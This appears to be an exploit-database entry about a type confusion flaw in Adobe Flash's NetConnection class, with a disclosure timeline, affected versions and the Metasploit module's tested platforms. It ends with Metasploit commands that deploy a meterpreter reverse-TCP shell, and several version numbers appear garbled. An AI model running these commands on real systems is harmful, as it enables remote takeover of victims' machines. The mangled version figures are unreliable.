Vulnerability discovered and reported to the vendor by Natalie Silvanovich in January 2015
Patch provided by the vendor via APSA15-05 the 2015-03-12
Vulnerability found exploited into exploit kits the 2015-03-19
Details of the vulnerability provided by Google Security the 2015-04-13
Metasploit PoC provided the 2015-05-28
PoC provided by :
Affected version(s) :
Adobe Flash Player 18.104.22.1685 and earlier versions
Adobe Flash Player 22.214.171.1242 and earlier 11.x versions
Tested on :
Windows 7 SP1 with IE 8 and Flash 126.96.36.1995
This module exploits a type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and ultimately accomplish remote code execution. This module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash 188.8.131.525.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 184.108.40.2065.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 220.127.116.115.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 18.104.22.1684.
* Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash 22.214.171.1242.
use exploit/multi/browser/adobe_flash_net_connection_confusion set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 getuid